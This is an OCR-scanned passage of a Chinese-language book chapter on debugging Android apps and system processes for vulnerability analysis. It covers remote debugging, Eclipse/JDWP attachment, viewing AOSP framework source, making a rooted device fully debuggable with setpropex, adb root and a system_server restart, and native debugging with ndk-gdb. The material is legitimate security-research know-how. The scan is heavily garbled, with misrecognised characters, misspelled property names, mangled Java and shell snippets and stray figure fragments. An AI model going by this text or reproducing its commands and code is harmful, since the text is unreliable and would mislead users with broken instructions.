以 上 前 省 由 sIGPIPE 信号 触发 ,系统 尝试 将 ps 命令 的 输出 结果 通过 管道 传 给 1olz 命令 时 ， 
发 现 1olz 命令 不 存在 。 然 后 , 操作 系统 将 此 SIGPIPE 信号 传送 给 ps 进程 来 通知 终止 进程 。 除 
了 SIGPIPE 信号 之 外 ， 一 些 其 他 信和 号 也 被 捕获 并 产生 原生 代码 崩溃 日 志 。 值 得 注意 的 是 ， 段 越 
界 错误 也 是 通过 此 功能 记录 到 日 志 中 的 。 

仅仅 使 用 月 演 dump 进行 调试 是 远 远 不 够 的 。 当 前 溃 dump 无 法 满足 需求 时 ， 人 研究 人 员 会 借 
助 交互 式 调 试 技 术 。 本 章 其 余部 分 关注 交互 式 调 试 方法 以 及 如 何 使 用 这 些 方法 来 分 析 漏 洞 。 










































































7.4 远程 调试 

通过 使 用 运行 在 目标 程序 之 外 独立 计算 机 上 的 调试 器 来 进行 调试 的 方法 , 称 为 远程 调试 。 这 
种 方法 通常 在 目标 程序 使 用 全 屏 图 像 时 , 或 像 我 们 这 种 情况 ,目标 设备 无 法 提供 合适 的 调试 接口 
时 使 用 。 远 程 调 试 必须 在 两 个 机 融 之 间 建 立 通信 信道 。 图 7-1 描述 了 一 种 典型 的 应 用 在 Android 
设备 上 的 远程 调试 配置 。 






































USB 或 Wi-Fi 连 接 











图 7-1 远程 调试 配置 


在 此 配置 中 ， 开 发 者 通过 同一 个 局 域 网 (LAN ) 或 通用 串 行 总 线 ( USB ) 将 其 设备 连接 到 主 
机 上 。 如 果 使 用 局 域 网 , 设备 通过 Wi-Fi 连接 到 网 络 。 如 果 使 用 USB, 则 直接 将 设备 插 到 主机 上 。 
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然后 ,开发 者 在 Android 设备 和 主机 上 分 别 运行 调试 器 服务 闫 和 客户 端 ， 通 过 客户 端 与 服务 顺 之 
间 的 通信 来 调试 目标 程序 。 

远程 调试 是 在 Android 平 台 上 调试 的 首选 方法 .此 方法 可 以 用 来 调试 Dalv 让 代码 和 原生 代码 。 
因为 大 部 分 Android 设备 的 屏幕 相对 较 小 , 而 且 没 有 物理 键盘 , 所 以 没有 友好 的 调试 接口 。 因 此 ， 
远程 调试 的 优越 性 不 言 而 喻 。 

















7.5 调试 Dalvik 代码 


Java 编程 语言 构成 了 Android 软件 生态 系统 的 绝 大 部 分 。 许 多 Android 应 用 以 及 Android 框 
架 层 都 是 用 Java 语 言 编写 然后 编译 成 Dalv 六 字 节 码 的 。 由 于 存在 一 些 非常 复杂 的 软件 栈 ( Software 
Stack )， 程 序 员 会 犯错 误 并 产生 bug。 使 用 调试 器 能 够 更 容易 地 跟踪 、 分 析 和 处 理 这 些 bug。 幸 
运 的 是 ， 有 许多 可 用 的 工具 来 调试 Dalvik 字 节 码 。 

与 Java 一 样 ，Dalvik 实现 了 一 个 标准 的 调试 接口 ， 称 为 Java 调试 线 协 议 (Java Debug Wire 
Protocol，JDWP )。 所 有 用 来 调试 Dalvik 和 Java 程序 的 工具 几乎 都 是 基于 此 协议 开发 的 。 虽 然 
此 协议 的 内 部 组 成 超出 了 本 书 的 范围 ， 但 是 研究 此 协议 对 一 些 读者 是 有 益 的 。 更 多 信息 可 以 参 
见 Oracle 的 JDWP 文 档 : http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp-spec.html。 
编写 本 书 时 , Android 小 组 提供 了 两 个 官方 开发 环境 。 较 新 的 是 Android Studio , 基于 JetBrains 
公司 开发 的 IntelliJIDEA。 遗 憾 的 是 ,该 工具 仍然 处 于 预 发 布 阶段 . 另 一 个 是 Eclipse IDE 的 Android 
开发 工具 (ADT ) 插件 ， 自 从 Android 软件 开发 套件 ( SDK ) 发 布 23 版 本 ,该 工具 已 成 为 了 官方 
支持 的 Android 应 用 开发 环境 。 

除了 开发 环境 ， 一 些 其 他 的 工具 也 是 依据 JDWP 标准 协议 开发 的 ， 例 如 Android SDK 中 的 
Android 设备 监视 器 和 Dalvik 调试 监视 服务 器 (DDMS ) 都 采用 了 JDWP 协议 。 这 些 工具 便于 对 
应 用 进行 分 析 以 及 对 其 他 系统 任务 进行 监控 。 它 们 使 用 JDWP 来 访问 指定 应 用 的 信息 ， 例 如 线程 、 
使 用 情况 以 及 正在 进行 的 方法 调用 。 除 了 包含 在 SDK 中 的 这 些 工具 ， 还 有 一 些 工具 也 是 基于 
JDWP 协议 开发 的 , 包括 Oracle Java 开发 组 件 (JDK ) 中 传统 的 Java 调试 器 ( JDB ), 以 及 第 4 章 介 
绍 的 AndBug 工具 。 这 绝 不 是 详尽 的 清单 ， 因 为 文中 未 列举 的 一 些 其 他 工具 也 采用 了 JDWP 协议 。 

为 了 简化 问题 , 本 节选 择 官方 支持 的 工具 进行 演示 。 在 本 节 的 所 有 实例 中 , 使 用 了 如 下 软件 : 
D Ubuntu 12.04 amd64 
口 来 自 eclipse-java-indigo-SR2-linux-gtk-x86_64.tar.gz 中 的 Eclipse 
口 Android SDK r22.0.5 
D Android NDK r9 
口 Android ADT 插 件 v22.0.5 

出 于 为 开发 者 提供 方便 的 目的 ，Android 小 组 在 2012 年 年 底 开 始 提 供 这 些 组 件 的 捆绑 下 载 ， 
称 为 ADT 套件 。 该 套件 包括 Eclipse、ADT 插 件 、Android SDK 和 平台 工具 等 。 无 需 单独 下 载 每 
一 个 组 件 ， 一 次 下 载 就 包括 了 大 部 分 开发 者 需要 的 一 切 。 唯 一 需要 注意 的 例外 是 Android NDK， 
只 有 开发 包含 原生 代码 的 应 用 时 才 会 用 到 它 。 
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7.5.1 调试 示例 应 用 


使 用 Eclipse 来 调试 Android 应 用 十 分 简单 。Android SDK 自 带 一 些 样本 应 用 来 帮助 你 熟悉 
Eclipse 环境 。 本 书 的 官网 上 有 关于 本 章 的 材料 , 里 面包 含 了 一 个 非常 简单 的 “Hello World ”应 用 ， 
链接 为 : www.wiley.com/go/androidhackershandbook。 我 们 在 本 节 使 用 这 个 应 用 进行 演示 。 接 下 来 ， 
将 Hellowor1ld 项 目 导 入 Eclipse 工作 空间 ,使 用 File> Importfollowed by General> Existing Projects 
into Workspace。 在 Eclipse 完成 加 载 后 ， 会 显示 如 图 7-2 所 示 的 界面 。 
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图 7-2 ”Eclipse Java 界面 


若 想 开始 调试 应 用 ， 点 击 工具 栏 中 的 Debug As 图 标 ( 看 起 来 像 只 虫子 ) 进入 Debug 界面 。 
正如 其 名 字 所 示 , 该 界面 是 专门 为 调试 设计 的 。 它 展示 了 与 调试 相关 的 窗口 , 关注 最 相关 的 信息 。 
图 7-3 展示 了 启动 调试 会 话 后 的 调试 界面 。 

正如 你 所 看 到 的 ， 一 些 窗口 在 Java 界面 中 并 没有 展示 。 实 际 上 ， 与 Java 界面 相同 的 窗口 只 
有 概要 和 源 代 码 窗 口 。 在 图 7-3 中 ,调试 器 停 在 了 一 个 主 activity 的 断 点 上 ， 通 过 高 亮 代 码 行 和 
调试 窗口 中 已 选 的 栈 帧 可 以 明显 看 出 这 一 点 。 点 击 调试 窗口 中 的 各 个 栈 帧 会 在 源 代码 窗口 中 显示 
附近 的 代码 。 点 击 没 有 可 用 源 代 码 的 栈 帧 时 会 显示 一 个 描述 性 错误 。 下 一 小 节 介 绍 调试 时 如 何 展 
示 来 自 Android 框架 层 的 源 代 码 。 

虽然 这 种 方法 很 简单 , 但 实际 上 在 后 台 发 生 了 许多 事情 。Eclipse 自动 负责 创建 该 应 用 的 调试 
版 本 ， 安 装 该 应 用 至 设备 ， 启 动 并 附加 到 调试 器 上 。 在 Android 设备 上 调试 应 用 通常 需要 应 用 
ee 清单 (也 称 为 AndroidManifestxml 文件 ) 中 的 android:debuggable=true 标志 。 稍 

， 在 7.5.3 节 中 会 介绍 一 些 调试 其 他 类 型 代码 的 方法 。 
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package com example, helloworld; 


Binport android. os. Bundle; 





public class MainActivity extends Activity { 





je 
rotected void onCreatelBundle savedInstanceState) { 
super. onCreate( savedInstanceState); 
setContentView(R. layout. activity main); 
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图 7-3 Eclipse 调试 界面 

















7.5.2 显示 框架 层 源 代码 


有 时候 需 要 查看 应 用 代码 与 Android 框架 层 的 交互 , 例如 想 了 解 应 用 是 如 何 被 调用 的 , 或 者 
函数 调用 进入 Android 框架 层 是 如 何 处 理 的 。 幸 运 的 是 ， 当 点 击 栈 帧 时 显示 Android 框架 层 源 代 
码 是 可 行 的 ， 和 显示 应 用 源 代码 一 样 。 

首先 需要 完成 的 是 正确 初始 化 AOSP 资料 库 。 正 确 地 初始 化 AOSP 资料 库 ， 可 以 参考 官网 
Android 文档 中 的 创建 说 明 , 链接 为 : http:/source.android.com/source/building.html。 若 使 用 Nexus 
设备 ， 正 如 我 们 建议 使 用 的 ， 需 要 特殊 留意 该 设备 使 用 的 分 支 和 配置 。 详 细 说 明 请 参考 
http://source.android.com/source/building-devices.html。 和 初始 化 的 最 后 一 步 是 运行 启动 命令 ， 在 正 
确 完成 AOSP 资料 库 初 始 化 后 ， 进 行 下 一 步 。 

下 一 步 操作 为 Eclipse 创建 类 路 径 。 在 AOSP 根 目录 下 ， 运行 make idegen 命令 来 创建 
idegen.sh 脚本 。 创 建 完成 后 ， 可 以 在 development/tools/idegen 目录 下 找到 此 脚本 。 运 行 此 脚 
本 前 , 在 顶层 目录 下 创建 excluded-paths 文件 ， 以 排除 顶层 目录 下 不 想 包 含 的 所 有 目录 。 为 了 
更 方便 地 进行 这 一 步 操 作 ， 本 书 附带 资料 中 提供 了 只 包含 frameworks 目录 的 excluded-paths 
文件 。 准 备 好 excluded-paths 文件 后 ， 执 行 idegen.sh 脚本 。 以 下 shell 会 话 片 段 展 示 了 成 功 执 
行 后 的 输出 结 


dev:~/android/source $ ./development/tools/idegen/idegen.sh 
Read excludes: 3ms 
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Traversed tree: 1794ms 

dev:~/android/source $ ls -1 .classpath 

-IW------- 1 jdrake jdrake 20K Aug 25 17:46 .classpath 
dev:~/android/source $ 


生成 的 类 路 径 数据 被 写 人 了 当前 目录 下 的 .classpath 文件 。 下 一 步 操作 将 使 用 这 个 文件 。 

下 一 步 是 新 建 一 个 工程 ,使 其 包含 刚才 类 路 径 中 的 代码 。 使 用 和 之 前 “Hello World” 应 用 相 
同 的 工作 空间 ， 通 过 File>New Project>Java> Java Project 新 建 一 个 Java 工程 。 输 入 项 目 名 称 ， 
如 AOSP Framework Source。 取消 Use Default Location 复 选 框 并 另外 指定 AOSP 顶层 目录 。 这 样 ， 
Eclipse 就 会 使 用 上 一 步 中 生成 的 .classpath 文件 。 点 击 Finish 结束 这 一 步 操 作 。 























注意 ”由 于 Android 代码 规模 庞大 ，Eclipse 创建 或 加 载 此 工程 时 可 能 会 导致 内 存 溢出 。 为 了 解 
决 此 问题 ， 启 动 Eclipse 时 增加 -vmargs-Xmx1024m 命令 行 选 项 。 


接 下 来 , 开始 调试 上 一 节 的 示例 应 用 。 如 果断 点 仍然 设置 在 主 activity 的 oncreate 方法 中 ， 
运行 时 会 在 那里 暂停 。 现 在， 点 击 调试 窗口 中 的 一 个 父 栈 帧 会 产生 Source Not Found 错误 。 点 击 
Attach Source 按钮 。 为 了 显示 出 此 按钮 ， 可 能 需要 扩大 窗口 ， 因 为 此 窗口 无 法 滑动 。Source 
Attachment Configuration 对 话 框 出 现 后 ， 点 击 Workspace 按钮 。 选 择 上 一 步 创 建 的 AOSP 
Framework Source 项 目 并 点 击 OK 按钮 ， 之 后 再 次 点 击 OK 按钮。 最后， 再 次 点 击 调试 窗口 中 的 
栈 帧 。 看 ! 和 所 选 栈 帧 相关 的 Android 框架 层 方 法 显示 出 来 了 。 图 7-4 展示 了 Eclipse 显示 调用 主 
activity 的 oncreate 方法 的 源 代码 。 
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return mParent != null ? mParent. getActivityToken() : mToken; 
} 


final void performCreate(BundLe icicle) { 
onCreatelicicle); © © Activity() 


cpF RESULT_CANCELED : int 








.getWindowStyle(). getBoolean( 
R. styleable. Window_windowNoDisplay, false); 
Ef Re | 
FF RESULT_FIRST_USER : int 
Final void performStart() { BF 

mFragnents. noteStateNotSaved(); EURED SA SERE) 
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图 7-4 Eclipse 中 Activity.performCreate 的 源 代 码 
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按照 本 节 接 下 来 的 说 明 ， 可 以 使 用 Eclipse 单 步 调试 Android 框架 层 源 代码 。 有 一 些 代 码 被 
有 意 排 除 在 了 类 路 径 之 外 。 如 果 有 必要 显示 已 排除 类 的 代码 ， 可 以 修改 其 中 的 excluded-paths 文 
件 。 反 之 ,如 果 确 定 调试 时 一 些 已 包含 路 径 是 没有 必要 的 ， 就 可 以 将 其 添加 到 excluded-paths 中 。 
修改 excluded-paths 后 ， 重 新 生成 .classpath 文件 。 


7.5.3 ”调试 现 有 代码 


调试 系统 服务 和 预 装 应 用 与 上 述 方法 稍 有 区 别 。 简 单 地 说 ， 调 试 Dalvik 代码 通常 需要 在 应 
用 中 将 androiqd:depbuggapble 标志 设置 为 true。 如 图 7-5 所 示 ， 启 动 Android SDK 中 自 带 的 
DDMS 或 Android Device Monitor， 只 显示 可 调试 的 进程 。 
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图 7-5 Android Device Monitor (ro.debuggable=0) 


如 图 所 示 ， 只 出 现 了 com.example.helloworld 应 用 。 对 于 原矿 设备 来 说 ， 情 况 通常 是 这 样 的 。 
使 用 eng 配置 生成 的 工程 设备 允许 访问 所 有 的 进程 。eng 与 user 或 userdebug 之 间 的 主 
要 区 别 在 于 系统 属性 ro.secure 和 ro.depbuggable 的 数值 。user 和 userdebug 生成 时 将 这 
两 个 值 分 别 设置 为 1 和 0; 而 eng 生成 时 设置 为 0 和 1。 另外 ，eng 生成 以 root 权限 运行 ADB 
守护 进程 。 本 节 将 介绍 在 已 root 设 备 上 修改 这 些 设置 以 及 实际 附加 现 有 进程 的 方法 。 
1. 伪造 调试 设备 
幸运 的 是 ,修改 已 root 设备 以 支持 调试 其 他 代码 并 不 复杂 。 共 有 两 种 实现 方法 , 各 有 其 优 缺 
第 一 种 方法 是 修改 设备 的 启动 过 程 ; 第 二 种 方法 更 加 容易 ， 可 以 在 已 root 设备 上 直接 进行 。 
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每 种 方法 都 需要 一 些 特殊 的 步 又 。 

第 一 种 方法 本 章 不 作 深 入 介绍 ， 即 修改 设备 中 default.prop 文件 的 ro.secure 和 ro. 
debuggapble 设置 。 然 而 ， 这 个 特殊 的 文件 通常 存储 于 initrd 镜像 中 。 由 于 是 ram 磁盘 ， 修 改 它 
需要 提取 并 重 打包 设备 的 bootimg 文件 。 虽然 这 种 方法 可 以 半 永 久 性 地 实现 系统 范围 的 调试 , 但 
是 目标 设备 需要 有 已 解锁 的 启动 加 载 器 (boot loader )。 如 果 倾 向 于 使 用 此 方法 ， 可 以 在 第 10 章 
中 找到 更 多 关于 创建 定制 bootimg 的 细节 。 

第 二 种 方法 只 需 以 root 用 户 执 行 一 些 简 单 操作 即 可 。 采 用 这 种 方法 避免 了 解锁 boot loader， 
但 不 是 永久 性 的 ， 以 下 步骤 在 设备 重启 后 就 失效 了 。 首 先 ， 获 取 一 份 setpropex 工具 ， 这 个 工具 
可 以 在 已 root 设 备 上 修改 只 读 的 系统 属性 。 使 用 此 工具 来 修改 ro.secure 为 0, ro.debuggable 
为 1。 

shell@maguro:/data/local/tmp $ su 

root@maguro:/data/local/tmp # ./setpropex ro.secure 0 

root@maguro:/data/local/tmp # ./setpropex ro.debuggable 1 

root@maguro:/data/local/tmp # getprop ro.secure 

0 


root@maguro:/data/local/tmp # getprop ro.debuggable 
1 


接 下 来 断 开 连接 ， 在 主机 上 使 用 aab root 命令 ， 以 root 权限 重新 启动 ADB 守护 进程 。 


root@maguro:/data/local/tmp # exit 
shell@maguro:/data/local/tmp $ exit 
dev:~/android $ adb root 

restarting adbd as root 
dev:~/android $ adb shell 
root@maguro:/ # 




































































注意 一 些 设备 ,包括 运行 Android4.3 的 Nexus 设备 ,将 adbd 二 进 制版 本 改 为 不 支持 adb root 
命令 。 对 于 这 些 设备 ， 重 新 挂 载 root 分 区 为 读 / 写 ,删除 /sbin/adbd， 并 复制 一 份 adpbd 
的 定制 userdebug 版 本 。 


最 后 , 重启 所 有 依赖 Dalvik VM 的 进程 。 这 一 步 并 非 强 制 要 求 , 因为 在 修改 ro .depbuggable 
盟 性 后 启动 的 任何 进程 都 是 可 调试 的 .如果 所 期 望 的 进程 已 经 在 运行 ,重启 此 进程 也 许 就 足够 了 。 
然而 ， 对 于 长 期 运行 的 进程 和 系统 服务 来 说 ， 重 局 Dalvik 层 是 必要 的 。 为 了 强制 重启 Android 
Dalv 玉 层 ， 可 以 简单 地 结束 system_server 进程 。 以 下 片段 展示 了 所 需 的 命令 : 


root@maguro:/data/local/tmp # ps | ./busybox grep system server 
system 2 二 吧 笑 953652 62492 ffffffff 4011c304 S system server 
root@maguro:/data/local/tmp # kill -9 527 
root@maguro:/data/local/tmp # 


kill 命令 执行 后 ， 设 备 应 该 会 重新 启动 。 这 是 正常 的 ， 表 示 Android Dalvik 层 正在 重启 。 
在 此 过 程 中 ， 不 应 该 中 断 ADB 与 设备 的 连接 。 当 主 界面 重新 出 现时 ， 所 有 的 Dalvik 进程 都 会 显 
示 出 来 ， 如 图 7-6 所 示 。 
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图 7-6 Android Device Monitor ( ro .debuggable=1 
除了 显示 所 有 进程 , 图 7-6 也 显示 了 system_server 进程 的 线程 。 如 果 不 使 用 工程 设备 或 进行 


本 节 所 列 的 步 又， 就 不 可 能 做 到 这 一 点 。 完 成 这 些 步 又 后 ， 就 可 以 使 用 DDMS 、Android Device 
Monitor， 甚 至 是 Eclipse 来 调试 系统 上 的 任何 Dalvik 进程 了 。 











注意 Pau Oliva 的 RootAdb 应 用 自动 执行 本 节 所 列 的 步骤 。 可 以 在 Google Play 上 找到 该 应 用 : 
https://play.google.com/store/apps/details?id=org.eslack.rootadb 。 


2. 附加 到 其 他 进程 

除了 基本 的 分 析 和 调试 ， 处 于 完全 调试 模式 下 的 设备 也 支持 实时 调试 任何 Dalvik 进程 。 通 
过 附加 到 进程 来 调试 也 是 一 个 渐进 的 简单 过 程 。 

在 Eclipse 启动 并 运行 的 状态 下 , 使 用 右上 角 的 界面 选择 器 转 至 DDMS 界面 。 在 Devices 窗 
口中 选择 期 望 的 目标 进程 ， 例 如 system process。 在 Run 菜单 中 选择 Debug Configurations 打开 
Debug Configurations 对 话 框 。 存 对话 框 左边 列表 中 选择 Remote Java Application 并 点 击 New 
Launch Configuration 按钮 。 在 Name 输入 框 中 输入 任意 名 称 ， 例 如 Attacher。 在 Connect 选项 卡 
选择 7.5.2 节 创 建 的 AOSP Framework Source 项 目 。 在 Host 输入 框 中 输入 127.0.0.1， 在 Port 输 
入 框 中 输入 8700。 
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注意 8700 端口 对 应 DDMS 界面 中 当前 选中 的 任何 一 个 进程 ,每 个 可 调试 进程 都 被 赋予 了 唯一 
的 端口 号 。 正 如 我 们 的 预料 ， 使 用 特定 于 进程 的 端口 生成 了 一 个 特定 于 该 进程 的 调试 配 
置 文件 。 


最 后 ， 点 击 Apply 按钮 ， 然 后 点 击 Debug 按钮 。 

此 时 , Eclipse 已 经 附加 到 了 system_process 进程 上 。 转 到 Debug 界面 会 在 Debug 窗口 中 显示 
该 进程 的 活动 线程 。 点 击 Suspend 按钮 将 会 停止 已 选 线程 。 图 7-7 描述 了 Eclipse 已 经 附加 至 
system_process 进程 上 ， 并 挂 起 了 WifiManager 服务 线程 。 
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路 outine 3 二 

Message next() { 万 S 4 
int pendingIdleHandlerCount = -1; // -1 only during first iteration 贸 章 遍及 区。 

int nextPollTimeoutMillis = 0; 加 | 





for (ii) { 
if (nextPollTimeoutMillis != 0) { 
Binder. flushPendingCommands( ); 
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nativePollOncelmPtr, nextPollTimeoutMillis); 





synchronized (this) { 
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图 7-7 Eclipse 已 附加 至 system_process 进程 


与 之 前 相同 ， 点 击 线程 的 栈 帧 将 会 引导 至 源 代码 的 相关 位 置 。 下 面 唯一 要 做 的 ， 就 是 利用 
Eclipse 调试 器 的 断 点 和 其 它 功能 来 跟踪 bug 或 探索 系统 内 部 工作 原理 。 


7.6 调试 原生 代码 


在 Android 平 台 上 开发 原生 代码 ( Native Code ) 所 用 的 C 和 C++ 编程 语言 缺乏 Dalvik 提供 的 
内 存 安全 特性 。 由 于 面临 更 多 的 潜在 陷阱 ， 更 可 能 发 生 错误 和 前 溃 。 这 样 的 bug 很 严重 ， 因 为 存 
在 被 攻击 者 利用 的 潜在 风险 。 因 此 ， 无 论 对 攻击 者 还 是 防御 者 来 说 ， 发 现 问题 的 根源 都 是 最 为 
重要 的 。 无 论 是 哪 种 情况 ， 使 用 交互 式 调试 来 分 析 存 在 漏洞 的 程序 都 是 得 到 期 望 结 果 最 为 常见 
的 途径 。 


本 节 讨 论调 试 Android 原生 代码 的 各 种 方法 。 第 一 ,使 用 Android 原生 开发 工具 包 (NDK ) 
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来 调试 编译 在 应 用 内 部 的 自 定义 原生 代码 ; 第 二 , 使 用 Eclipse 调试 原生 代码 ; 第 三 , 使 用 AOSP 
在 Nexus 设备 上 调试 Android 浏览 器 ; 第 四 ,使 用 AOSP 实现 完全 源 代码 级 别 的 交互 式 调试 。 第 
五 ， 调 试 运行 在 非 Nexus 设备 上 的 原生 代码 。 


























7.6.1 使 用 NDK 进行 调试 


Android 支持 通过 NDK 开发 自 定义 的 原生 代码 。 从 4b 版 本 开始 ，NDK 包含 了 一 个 易 用 的 
ndk-gdb 脚本 。 该 脚本 的 出 现 意味 着 官方 开始 支持 对 应 用 中 原生 代码 的 调试 了 。 本 节 介 绍 调试 原 
生 代 码 的 要 求 ， 详 细 描述 了 准备 过 程 及 其 内 部 工作 原理 ， 并 讨论 了 该 脚本 的 局 限 性 。 














警告 ”Android4.3 版 本 的 Over-the-Air ( OTA ) 更 新 引入 了 NDK 调试 的 不 兼容 问题 。 可 以 在 
Android bug 跟踪 系统 的 问题 58373 中 找到 更 多 参考 信息 ， 包 括 解决 方法 。Android4.4 修 
复 了 此 问题 。 


1. 准备 用 于 调试 的 应 用 

要 了 解 NDK 的 调试 支持 ,需要 一 台 运 行 Android2.2 或 以 上 版 本 的 设备 或 模拟 器 。 若 要 调试 
多 线程 原生 代码 ， 则 需要 使 用 Android2.3 或 以 上 版 本 。 不 幸 的 是 ，Android 上 的 几乎 所 有 代码 都 
是 多 线程 的 ， 而 运行 如 此 旧 Android 版 本 的 设备 正在 逐渐 减少 。 最 后 ， 在 准备 阶段 必须 创建 可 以 
用 于 调试 的 目标 应 用 。 

准备 目标 应 用 的 方法 因 使 用 的 生成 系统 而 异 。 通 过 设置 NDK_DEBUG 环境 变量 为 1， 就 能 开 
启 使 用 NDK 的 原生 代码 调试 (通过 ndqk-pbuila )。 如 果 使 用 Eclipse， 就 需要 修改 工程 属性 ， 这 
将 在 下 节 讨 论 。 也 可 以 使 用 Apache Ant 后 成 系统 , 通过 ant debug 命令 来 生成 支持 调试 的 应 用 。 
不 论 使 用 哪个 生成 系统 ， 对 成 功 调试 原生 代码 来 说 ， 在 生成 阶段 开启 调试 都 是 必要 的 。 


















































注意 ”使 用 本 节 讨 论 的 脚本 时 ， 环 境 变 量 路 径 中 需要 包含 NDK 目录 。 


2. 实践 所 见 

为 了 演示 使 用 NDK 调试 原生 代码 的 整个 过 程 ， 对 “Hello World” 应 用 稍微 进行 修改 。 使 用 
一 个 Java 原生 接口 (JNI ) 方法 将 一 个 字符 串 返 回 给 应 用 ， 而 不 是 显示 字符 串 。 本 章 的 资料 包 中 
有 演示 应 用 的 代码 。 以 下 片段 展示 了 使 用 NDK 生成 应 用 的 命令 。 


dev:NativeTest $ NDK_DEBUG=1 ndk-build 


























GdbServer : [arm-linux-androideabi-4.6] libs/armeabi/gdbserver 
Gdbsetup : libs/armeabi/gdb.setup 

Compile thumb :hello=jni <=, hello=Jni..e 

SharedLibrary : lipbhello-jni.so 

Install : lipbhello-jni.so => libs/armeabi/libhello-jni.so 


Dev:NativeTest $ 


通过 以 上 输出 结果 可 以 明显 看 出 ,设置 NDK_DEBUG 环境 变量 后 ，ndk-build 脚本 会 做 额外 的 
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事情 。 首 先 ， 该 脚本 向 应 用 包 中 添加 了 一 个 gdbserver 二 进 制 文件 。 这 是 必要 的 ， 因 为 设备 一 般 
没有 安装 GDB 服务 器 。 此 外 ,使 用 与 GDB 客户 端 匹 配 的 gdbserver 可 以 最 大 程度 地 保证 调试 的 
容 性 和 可 靠 性 。 其 次 ，ndk-build 创建 了 一 个 gdb.setup 文件 。 查 看 该 文件 内 容 ， 可 以 看 出 该 文 
件 是 为 GDB 客户 端 自动 生成 的 短 脚 本 。 该 脚本 协助 配置 GDB ， 使 其 能 够 找到 本 地 库 文 件 副本 ， 
包括 JNI 和 源 代 码 。 

在 这 种 生成 方法 中 , 生成 原生 代码 与 生成 应 用 包 是 互 不 相干 的 。 要 完成 剩余 的 操作 ,可 以 使 
用 Apache Ant。 使 用 Apache Ant 的 ant debug install 命令 可 以 一 步 完 成 应 用 包 的 生成 和 安 
装 。 以 下 片段 展示 了 这 个 过 程 。 简 清 起 见 ， 许 多 输出 结果 已 被 省 略 。 

dev:NativeTest $ ant debug install 


Buildfile: /android/ws/1/NativeTest/build.xml 
Bes 


install: 
echo] Installing /android/ws/1/NativeTest/bin/MainActivity-debug.apk 

















法 












































onto 
default emulator or device... 

exec] 759 KB/s (393632 bytes in 0.506s) 

exec] pkg: /data/local/tmp/MainActivity-debug.apk 
exec] Success 





BUILD SUCCESSFUL 
Total time: 16 seconds 


应 用 包 安 装 完成 后 ， 就 可 以 开始 调试 该 应 用 了 。 

无 参数 执行 ndk-gdb 脚本 时 ， 脚 本 会 尝试 寻找 目标 应 用 的 一 个 运行 示例 。 如 果 没 有 找到 ， 就 
会 打印 错误 信息 。 有 多 种 方法 可 以 解决 这 个 问题 , 但 是 所 有 方法 ( 只 有 一 个 除外 ) 都 需要 手动 启 
动 该 应 用 。 最 方便 的 方法 是 为 ndk-gdb 脚本 提供 --start 参数 ， 如 以 下 片段 所 示 。 


dev:NativeTest $ ndk-gdb --start 

Set uncaught java.lang.Throwable 

Set deferred uncaught java.lang.Throwable 

Triitializing.' ja .3 

> Input stream closed. 

GNU gdb (GDB) 7.3.1-gg2 

Copyright (C) 2011 Free Software Foundation, Inc. 

[SR 

warning: Could not load shared library symbols for 82 libraries, e.g. 
libstdc++.so. 

Use the "info sharedlibrary" command to see the complete listing. 

Do you need "set solib-search-path" or "set sysroot"? 

warning: Breakpoint address adjusted from 0x40179b79 to 0x40179b78 . 
0x401pp5dq4 in _ futex syscall3 () from 
/android/ws/1/NativeTest/obj/local/armeabi/libc.so 

(gdb) break Java_com example nativetest MainActivity_stringFromJNI 
Function "Java_com example nativetest MainActivity_stringFromJNI" not 
defined. 

Make breakpoint pending on future shared library load? (y or [n]) y 











Breakpoint 1 (Java_ com example nativetest MainActivity_stringFromJNI) 


176 第 7 章 调试 与 分 析 安 全 漏洞 





pending. 
(gdb) cont 
Continuing. 


使 用 这 种 方法 的 最 大 优势 是 能 够 较 早 地 在 原生 代码 执行 路 径 中 设置 断 点 。 然而 , 这 个 功能 在 
Android 4.2.2 和 4.3 版 本 上 使 用 NDK r9 时 会 遇 到 问题 。 确 切 地 说 ， 应 用 并 没有 启动 ， 而 是 不 断 
显示 等 得 调试 器 的 对 话 框 。 幸 运 的 是 ， 有 一 个 简单 的 解决 办 法 。 原 生 GDB 客户 端 启 动 后 ， 手 动 
运行 Java 调试 器 并 将 其 连接 至 默认 端点 即 可 ， 如 下 所 示 : 

dev:~ $ jdb -connect com.sun.jdi.SocketAttach:hostname=127.0.0.1,port=65534 

Set uncaught java.lang.Throwable 

Set deferred uncaught java.lang.Throwable 


Initiali2ing. 本 GD ei 
> 


可 以 通过 挂 起 脚本 进程 运行 此 命令 ,也 可 以 在 另 一 个 窗口 中 运行 。JDB 连接 成 功 后 ,应 用 开 
始 运 行 ， 上 个 片段 中 设置 的 断 点 就 会 被 触发 。 

Breakpoint 1, Java_com example nativetest MainActivity_stringFromJNI 

(env=0x40168d90, thiz=0x7af0001d) at jni/hello-jni.c:31 

ey __angdroiqd_log_print (ANDROID_ LOG_ ERROR, "NativeTest", "INSIDE 


JNI!"); 
(gdb) 


使 用 这 种 解决 办 法 ,可 以 方便 地 在 程序 较 早 运行 的 位 置 设置 断 点 。 即 使 手动 启动 应 用 , 通常 
也 可 能 会 因为 旋转 设备 方向 而 导致 应 用 重新 执行 oncreate 事件 处 理 程序 ,这 样 也 有 助 于 设置 一 
些 难以 捉摸 的 断 点 。 




































































注意 ”编写 这 本 书 时 , 我 们 贡献 了 一 个 简单 的 补丁 来 修复 此 问题 : https://code.google.com/p/android/ 
issues/detail?id=60685#c4。 





NDK 的 较 新 版 本 包含 了 ndk-gdb-py 脚本 ， 它 与 ndk-gdb 类 似 ， 是 用 Python 语言 编写 的 ( 非 
shell 脚本 )。 虽 然 该 脚本 不 会 遇 到 不 断 等 待 调试 器 的 问题 ， 但 是 也 有 其 自身 的 问题 。 具 体 来 说 ， 
如 果 应 用 以 较 旧 的 Android SDK 版 本 作为 调试 目标 ， 就 会 遇 到 问题 。 其 实 ， 只 需 简 单 地 修改 一 行 
就 可 修复 该 问题 ， 这 种 修改 方法 原本 用 于 修复 之 前 的 一 个 bug。 希望 这 些 问题 能 够 随 着 时 间 的 推 
移 得 到 解决 ，NDK 的 调试 功能 可 以 变 得 更 加 健壮 可 用 。 

3. 内 在 原理 探究 

顺利 躲 过 问题 雷 区 后 ， 就 可 以 调试 原生 代码 了 。 但 是 在 运行 ndk-build 脚本 时 到 底 发 生 了 什 
么 ? 使 用 --verbose 参数 运行 脚本 会 阐明 这 个 问题 。 查 看 NDK 位 于 docs/NDK-GDB.html 的 官 
方 文档 也 有 助 于 解释 这 个 问题 。 该 shell 脚本 有 750 行 左 右 ， 阅 读 起 来 并 不 困难 。 最 相关 的 部 分 
